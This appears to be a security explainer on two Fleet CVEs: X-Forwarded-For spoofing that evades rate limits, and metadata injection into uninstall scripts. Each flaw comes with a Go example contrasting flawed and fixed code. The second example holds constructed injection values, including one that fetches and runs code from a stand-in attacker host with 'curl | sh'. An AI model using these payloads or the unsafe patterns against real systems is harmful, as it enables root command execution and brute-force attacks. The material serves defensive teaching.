CVE-2026-46356 affects Fleet versions before 4.80.1. Fleet’s client-IP extraction logic accepted forwarded IP headers (such as X-Forwarded-For) without verifying that they came from a trusted proxy, which let unauthenticated attackers supply arbitrary values in those headers and evade per-IP rate limits and IP bans. The practical risk is increased exposure of public Fleet deployments to brute-force login and credential-stuffing attempts, especially whe [truncated]
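The flaw class above comes down to which peer is allowed to assert a client address. The following Go program is an added example written for this page, not Fleet's own code: it contrasts a naive extractor that honours X-Forwarded-For from anyone with one that only consults the header when the TCP peer is a configured proxy and then walks the header from the right, skipping the deployment's own proxies. The proxy ranges, request helper and sample addresses are assumptions for the illustration.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"strings"
)

// trustedProxyCIDRs lists the reverse proxies allowed to set forwarding
// headers. These ranges are an assumption for the example; a deployment
// must configure its own.
var trustedProxyCIDRs = mustParseCIDRs("127.0.0.0/8", "10.0.0.0/8")

func mustParseCIDRs(cidrs ...string) []*net.IPNet {
	var nets []*net.IPNet
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		nets = append(nets, n)
	}
	return nets
}

func isTrustedProxy(ip net.IP) bool {
	for _, n := range trustedProxyCIDRs {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// peerIP returns the address of the TCP peer with the port stripped.
func peerIP(r *http.Request) net.IP {
	host, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		host = r.RemoteAddr
	}
	return net.ParseIP(host)
}

// NaiveClientIP is the flawed pattern: X-Forwarded-For is honoured from any
// peer, so a client connecting directly can choose the address the rate
// limiter and ban list will see.
func NaiveClientIP(r *http.Request) string {
	if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
		return strings.TrimSpace(strings.Split(xff, ",")[0])
	}
	return peerIP(r).String()
}

// ClientIP consults X-Forwarded-For only when the peer is a trusted proxy,
// then walks the hops right to left, skipping our own proxies, and returns
// the first address a trusted proxy actually observed. A malformed hop or a
// header containing only our proxies falls back to the peer address.
func ClientIP(r *http.Request) string {
	peer := peerIP(r)
	if peer == nil {
		return r.RemoteAddr
	}
	if !isTrustedProxy(peer) {
		return peer.String() // direct connection: headers are attacker-controlled
	}
	hops := strings.Split(r.Header.Get("X-Forwarded-For"), ",")
	for i := len(hops) - 1; i >= 0; i-- {
		ip := net.ParseIP(strings.TrimSpace(hops[i]))
		if ip == nil {
			return peer.String()
		}
		if !isTrustedProxy(ip) {
			return ip.String()
		}
	}
	return peer.String()
}

// newRequest builds a constructed request with the given peer and header.
func newRequest(remoteAddr, xff string) *http.Request {
	r, _ := http.NewRequest("GET", "/api/v1/fleet/login", nil)
	r.RemoteAddr = remoteAddr
	if xff != "" {
		r.Header.Set("X-Forwarded-For", xff)
	}
	return r
}

func main() {
	direct := newRequest("203.0.113.9:51234", "198.51.100.1")
	proxied := newRequest("10.0.0.5:443", "198.51.100.1, 203.0.113.9")
	fmt.Println("direct  naive:", NaiveClientIP(direct), " fixed:", ClientIP(direct))
	fmt.Println("proxied naive:", NaiveClientIP(proxied), " fixed:", ClientIP(proxied))
}
```

Walking from the right matters: a client can prepend any number of hops to X-Forwarded-For before the request reaches the proxy, but it cannot remove the hop the proxy itself appends, so the rightmost non-proxy address is the only one the server has grounds to rate-limit or ban.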
CVE-2026-26191 is a Fleet device-management vulnerability in the software installer pipeline. If a crafted software package is uploaded and later uninstalled, unsanitized metadata from that package can be inserted into auto-generated uninstall scripts. When those scripts run on managed endpoints, an attacker could trigger unintended command execution with elevated privileges: root on macOS/Linux or SYSTEM [truncated]
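The underlying bug is string interpolation of package metadata into a script body. The Go program below is an added example written for this page, not Fleet's installer code, and covers only the POSIX shell path (macOS/Linux): it shows an uninstall-script generator that pastes metadata straight into shell text beside one that allowlists the bundle identifier, rejects unsafe paths, and single-quotes every remaining value. The PackageMeta type, field names, script contents and the constructed malicious metadata are assumptions for the illustration.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// PackageMeta stands in for metadata a server reads out of an uploaded
// package. The field names are assumed for this example.
type PackageMeta struct {
	Name     string // display name shown in logs
	BundleID string // identifier passed to pkgutil --forget
	Path     string // install location removed on uninstall
}

// UnsafeUninstallScript is the flawed pattern: attacker-influenced metadata
// is interpolated directly into a script that later runs as root.
func UnsafeUninstallScript(m PackageMeta) string {
	return fmt.Sprintf("#!/bin/sh\nset -e\necho \"Removing %s\"\nrm -rf \"%s\"\npkgutil --forget %s\n",
		m.Name, m.Path, m.BundleID)
}

// ShellQuote wraps s in single quotes so the shell treats it as one literal
// word. Inside single quotes only the quote itself needs escaping, written
// as '\'' (close quote, escaped quote, reopen quote).
func ShellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// bundleIDPattern is an assumed allowlist: reverse-DNS style identifiers
// only, and no leading dash so the value can never be read as a flag.
var bundleIDPattern = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._-]*$`)

// SafeUninstallScript validates what can be validated and quotes the rest.
func SafeUninstallScript(m PackageMeta) (string, error) {
	for _, v := range []string{m.Name, m.Path, m.BundleID} {
		if strings.ContainsRune(v, 0) {
			return "", errors.New("metadata contains a NUL byte")
		}
	}
	if !bundleIDPattern.MatchString(m.BundleID) {
		return "", fmt.Errorf("bundle id %q is not a valid identifier", m.BundleID)
	}
	if !strings.HasPrefix(m.Path, "/") || m.Path == "/" {
		return "", fmt.Errorf("install path %q must be absolute and not the root", m.Path)
	}
	var b strings.Builder
	b.WriteString("#!/bin/sh\nset -e\n")
	fmt.Fprintf(&b, "echo Removing %s\n", ShellQuote(m.Name))
	fmt.Fprintf(&b, "rm -rf -- %s\n", ShellQuote(m.Path))
	fmt.Fprintf(&b, "pkgutil --forget %s\n", ShellQuote(m.BundleID))
	return b.String(), nil
}

// malicious is constructed input: the name closes the double quote in the
// unsafe echo line and the bundle id appends a second command.
var malicious = PackageMeta{
	Name:     `Notes"; curl -s http://attacker.invalid/x | sh; echo "`,
	BundleID: `com.example.notes; id > /tmp/pwned`,
	Path:     "/Applications/Notes.app",
}

func main() {
	fmt.Print("--- unsafe ---\n", UnsafeUninstallScript(malicious))
	if _, err := SafeUninstallScript(malicious); err != nil {
		fmt.Println("--- safe --- rejected:", err)
	}
}
```

Quoting alone is enough to neutralise the name, but the bundle identifier is better handled by an allowlist: a value that does not look like an identifier has no legitimate reason to be in the package, and rejecting it at upload time keeps the problem out of the script entirely.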